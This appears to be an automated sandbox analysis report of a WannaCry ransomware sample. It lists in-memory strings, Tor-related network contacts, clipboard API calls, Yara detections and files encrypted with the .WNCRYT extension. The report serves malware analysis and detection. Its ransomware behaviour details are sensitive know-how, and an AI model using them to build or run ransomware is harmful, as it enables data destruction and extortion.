Source: @WanaDecryptor@.exe, 0000001B.00000003.2036998124.0000000002768000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001B.00000003.2036775143.0000000002761000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 0000001F.00000002.5878121142.000000006FFC0000.00000008.00000001.01000000.00000011.sdmp	String found in binary or memory: http://www.zlib.net/D
Source: @WanaDecryptor@.exe, 0000001B.00000003.2037130930.0000000002863000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr	String found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relay
Source: @WanaDecryptor@.exe, 0000001B.00000003.2037130930.0000000002863000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr	String found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relayError
Source: @WanaDecryptor@.exe, 00000021.00000002.5853775977.000000000019A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
Source: @WanaDecryptor@.exe, 0000001B.00000002.5853881951.0000000000198000.00000004.00000010.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001E.00000002.2120270411.000000000019B000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
Source: @WanaDecryptor@.exe, 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip(B
Source: taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr	String found in binary or memory: https://trac.torproject.org/8742
Source: taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr	String found in binary or memory: https://trac.torproject.org/projects/tor/ticket/14917.
Source: taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr	String found in binary or memory: https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%s
Source: taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr	String found in binary or memory: https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%sDANGEROUS_SOCKS
Source: @WanaDecryptor@.exe, 00000021.00000002.5857492036.0000000000B60000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000021.00000000.2040530880.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000002F.00000002.2348372222.0000000000421000.00000004.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000002F.00000000.2346390626.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe0.0.dr	String found in binary or memory: https://www.google.com/search?q=how
Source: taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr	String found in binary or memory: https://www.torproject.org/
Source: taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr	String found in binary or memory: https://www.torproject.org/docs/faq.html#BestOSForRelay
Source: taskhsvc.exe.27.dr	String found in binary or memory: https://www.torproject.org/documentation.html
Source: taskhsvc.exe, 0000001F.00000002.5865453654.00000000015FA000.00000004.00000010.00020000.00000000.sdmp, taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr	String found in binary or memory: https://www.torproject.org/download/download#warning
Source: taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr	String found in binary or memory: https://www.torproject.org/download/download#warningalphabetaThis

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

Code function: 27_2_0040DB80 recv,

27_2_0040DB80

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	TCP traffic detected without corresponding DNS query: 78.142.142.246
Source: unknown	TCP traffic detected without corresponding DNS query: 194.109.206.212
Source: unknown	TCP traffic detected without corresponding DNS query: 78.142.142.246
Source: unknown	TCP traffic detected without corresponding DNS query: 194.109.206.212
Source: unknown	TCP traffic detected without corresponding DNS query: 78.142.142.246
Source: unknown	TCP traffic detected without corresponding DNS query: 194.109.206.212
Source: unknown	TCP traffic detected without corresponding DNS query: 146.185.177.103
Source: unknown	TCP traffic detected without corresponding DNS query: 146.185.177.103
Source: unknown	TCP traffic detected without corresponding DNS query: 146.185.177.103
Source: unknown	TCP traffic detected without corresponding DNS query: 146.185.177.103
Source: unknown	TCP traffic detected without corresponding DNS query: 146.185.177.103
Source: unknown	TCP traffic detected without corresponding DNS query: 163.172.157.213
Source: unknown	TCP traffic detected without corresponding DNS query: 199.254.238.52
Source: unknown	TCP traffic detected without corresponding DNS query: 199.254.238.52
Source: unknown	TCP traffic detected without corresponding DNS query: 163.172.157.213
Source: unknown	TCP traffic detected without corresponding DNS query: 163.172.157.213
Source: unknown	TCP traffic detected without corresponding DNS query: 199.254.238.52
Source: unknown	TCP traffic detected without corresponding DNS query: 212.47.237.95
Source: unknown	TCP traffic detected without corresponding DNS query: 212.47.237.95
Source: unknown	TCP traffic detected without corresponding DNS query: 212.47.237.95
Source: unknown	TCP traffic detected without corresponding DNS query: 212.47.237.95
Source: unknown	TCP traffic detected without corresponding DNS query: 212.47.237.95
Source: unknown	TCP traffic detected without corresponding DNS query: 86.59.21.38
Source: unknown	TCP traffic detected without corresponding DNS query: 86.59.21.38
Source: unknown	TCP traffic detected without corresponding DNS query: 86.59.21.38
Source: unknown	TCP traffic detected without corresponding DNS query: 86.59.21.38
Source: unknown	TCP traffic detected without corresponding DNS query: 86.59.21.38
Source: unknown	TCP traffic detected without corresponding DNS query: 86.59.21.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.254.246.203
Source: unknown	TCP traffic detected without corresponding DNS query: 51.254.246.203
Source: unknown	TCP traffic detected without corresponding DNS query: 51.254.246.203
Source: unknown	TCP traffic detected without corresponding DNS query: 51.254.246.203
Source: unknown	TCP traffic detected without corresponding DNS query: 51.254.246.203
Source: unknown	TCP traffic detected without corresponding DNS query: 131.188.40.189
Source: unknown	TCP traffic detected without corresponding DNS query: 131.188.40.189
Source: unknown	TCP traffic detected without corresponding DNS query: 131.188.40.189
Source: unknown	TCP traffic detected without corresponding DNS query: 131.188.40.189
Source: unknown	TCP traffic detected without corresponding DNS query: 131.188.40.189
Source: unknown	TCP traffic detected without corresponding DNS query: 131.188.40.189
Source: unknown	TCP traffic detected without corresponding DNS query: 5.39.92.199
Source: unknown	TCP traffic detected without corresponding DNS query: 5.39.92.199
Source: unknown	TCP traffic detected without corresponding DNS query: 5.39.92.199

Source: taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr	String found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
Source: taskhsvc.exe, 0000001F.00000002.5866027043.00000000038D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)

Source: unknown	HTTPS traffic detected: 86.59.21.38:443 -> 192.168.11.20:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 131.188.40.189:443 -> 192.168.11.20:49740 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to modify clipboard data

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_00407C30 OpenClipboard,GlobalAlloc,CloseClipboard,EmptyClipboard,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,	27_2_00407C30
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_004035A0 SendMessageA,SendMessageA,OpenClipboard,SendMessageA,#3301,#924,#800,#800,SendMessageA,GlobalAlloc,GlobalLock,GlobalFree,SendMessageA,#3301,#924,#800,MultiByteToWideChar,wcslen,wcslen,#800,SendMessageA,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,	27_2_004035A0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_00407C30 OpenClipboard,GlobalAlloc,CloseClipboard,EmptyClipboard,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,	30_2_00407C30
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_004035A0 SendMessageA,SendMessageA,OpenClipboard,SendMessageA,#3301,#924,#800,#800,SendMessageA,GlobalAlloc,GlobalLock,GlobalFree,SendMessageA,#3301,#924,#800,MultiByteToWideChar,wcslen,wcslen,#800,SendMessageA,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,	30_2_004035A0

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

Code function: 27_2_00407C30 OpenClipboard,GlobalAlloc,CloseClipboard,EmptyClipboard,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,

27_2_00407C30

Spam, unwanted Advertisements and Ransom Demands

Yara detected Wannacry ransomware

Source: Yara match	File source: Wannacry.exe, type: SAMPLE
Source: Yara match	File source: 47.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 47.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.Wannacry.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.2017719338.000000000041F000.00000008.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.2015355782.000000000041F000.00000008.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.5854720396.000000000041F000.00000008.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.848497025.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.2040530880.000000000041F000.00000008.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.2348326263.000000000041F000.00000008.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2011922304.0000000000802000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1362189646.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000000.2346390626.000000000041F000.00000008.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2010730954.0000000000801000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Wannacry.exe PID: 2584, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: @WanaDecryptor@.exe PID: 8616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: @WanaDecryptor@.exe PID: 8904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: @WanaDecryptor@.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: @WanaDecryptor@.exe PID: 5580, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\Desktop\u.wnry, type: DROPPED
Source: Yara match	File source: C:\@WanaDecryptor@.exe, type: DROPPED
Source: Yara match	File source: C:\@WanaDecryptor@.exe, type: DROPPED
Source: Yara match	File source: C:\@WanaDecryptor@.exe, type: DROPPED
Source: Yara match	File source: C:\@WanaDecryptor@.exe, type: DROPPED
Source: Yara match	File source: C:\@WanaDecryptor@.exe, type: DROPPED
Source: Yara match	File source: C:\@WanaDecryptor@.exe, type: DROPPED
Source: Yara match	File source: C:\@WanaDecryptor@.exe, type: DROPPED
Source: Yara match	File source: C:\@WanaDecryptor@.exe, type: DROPPED

Yara detected Conti ransomware

Source: Yara match

File source: Process Memory Space: @WanaDecryptor@.exe PID: 8616, type: MEMORYSTR

Detected Wannacry Ransomware

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: CreateFileW,GetFileTime,ReadFile,ReadFile,ReadFile,ReadFile,ReadFile,CloseHandle,CreateFileW,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,WriteFile,SetFilePointer,SetEndOfFile,CreateFileW,ReadFile,WriteFile,_local_unwind2,SetFilePointerEx,SetEndOfFile,SetFileTime,CloseHandle,MoveFileW,_local_unwind2, WANACRY!		27_2_004020A0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: CreateFileW,GetFileTime,ReadFile,ReadFile,ReadFile,ReadFile,ReadFile,CloseHandle,CreateFileW,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,WriteFile,SetFilePointer,SetEndOfFile,CreateFileW,ReadFile,WriteFile,_local_unwind2,SetFilePointerEx,SetEndOfFile,SetFileTime,CloseHandle,MoveFileW,_local_unwind2, WANACRY!		30_2_004020A0

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\Wannacry.exe	File moved: C:\Users\user\Desktop\GIGIYTFFYT\ZIPXYXWIOY.jpg	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File moved: C:\Users\user\Desktop\EWZCVGNOWT\KLIZUSIQEN.pdf	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File moved: C:\Users\user\Desktop\GIGIYTFFYT\GIGIYTFFYT.docx	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File moved: C:\Users\user\Desktop\GIGIYTFFYT.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File moved: C:\Users\user\Desktop\EWZCVGNOWT\GIGIYTFFYT.xlsx	Jump to behavior

Writes many files with high entropy

Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx.WNCRYT entropy: 7.9999497909	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db.WNCRYT entropy: 7.99911718063	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db.WNCRYT entropy: 7.9993380424	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000034.db.WNCRYT entropy: 7.9982023822	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000035.db.WNCRYT entropy: 7.99826901096	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db.WNCRYT entropy: 7.99226591344	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db.WNCRYT entropy: 7.99228534228	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\winword.exe.db.WNCRYT entropy: 7.99249783407	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db.WNCRYT entropy: 7.99983723293	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db.WNCRYT entropy: 7.99996756225	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db.WNCRYT entropy: 7.99991943793	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db.WNCRYT entropy: 7.99995133829	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db.WNCRYT entropy: 7.99839915712	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db.WNCRYT entropy: 7.99982950697	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT entropy: 7.99984220549	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT entropy: 7.9998090632	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db.WNCRYT entropy: 7.99981236579	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT entropy: 7.99995366399	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT entropy: 7.99413260184	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.WNCRYT entropy: 7.99981882608	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpnidm\36378e77.png.WNCRYT entropy: 7.99187094602	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469\ActivitiesCache.db.WNCRYT entropy: 7.99980207519	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366672597747525.txt.WNCRYT entropy: 7.99822487779	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db.WNCRYT entropy: 7.99399158913	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366673054843582.txt.WNCRYT entropy: 7.99821289667	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366673354927603.txt.WNCRYT entropy: 7.99846079913	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRYT entropy: 7.99987981707	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb.WNCRYT entropy: 7.99990731963	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\appsglobals.txt.WNCRYT entropy: 7.99953826868	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\appssynonyms.txt.WNCRYT entropy: 7.99951423155	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{46669ec3-9227-40ac-89bc-b477e4677a0b}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99595578838	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_window.js.WNCRYT entropy: 7.99943190262	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5e0f71d6-4ae9-410b-87f6-29dff172110e}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99582996407	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{6e3a287d-8222-4208-8758-9aa4793f0897}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99605758959	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Intel\CUIPromotions\Images\000000_INTEL.ODYSSEY_ADDITIONAL_GAMEPLAY_ASSET_CUI.2.3-600x300.png.WNCRYT entropy: 7.99907193188	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{a57f3ddc-63c5-42f9-b016-09afa52762e5}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99571234019	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache\microsoft-windows-photos_8wekyb3d8bbwe-app_339_0.png.WNCRYT entropy: 7.99662214899	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\appsconversions.txt.WNCRYT entropy: 7.99987118448	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\settingsconversions.txt.WNCRYT entropy: 7.99965161403	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3075AAB0-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.WNCRYT entropy: 7.9995842158	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\settingsglobals.txt.WNCRYT entropy: 7.99720126617	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db.WNCRYT entropy: 7.997585036	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\settingssynonyms.txt.WNCRYT entropy: 7.99839375816	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000018.db.WNCRYT entropy: 7.99805036289	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{b5f948f2-ed43-4efa-a5e8-c66e8e4b2569}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99914902242	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fd8f40a4-ac14-48d6-9ef0-afd19dd2a012}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99910287809	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx.WNCRYT entropy: 7.99610804017	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\eventpage_bin_prod.js.WNCRYT entropy: 7.99762885152	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_background.js.WNCRYT entropy: 7.9996405775	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif.WNCRYT entropy: 7.99712162538	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\-umYvKan2Fj4E8h5L_SxCu7_7dI.br[1].js.WNCRYT entropy: 7.99893870408	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\01qAHnoKVsYCw2MCbu8M0CLkEkU.br[1].js.WNCRYT entropy: 7.99853602302	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\3k8Z8BOb5M0fNQQd-jpULj6ZcBI.br[1].js.WNCRYT entropy: 7.99213187582	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\584482RVjBIoEvVSe0RsuS1I4YQ.br[1].js.WNCRYT entropy: 7.99578817507	Jump to dropped file
Source: C:\Users\user\Desktop\Wannacry.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\38\5_KhThI0onehz_-3sl58j0dOeLI.br[1].js.WNCRYT entropy: 7.99854173195	Jump to dropped file
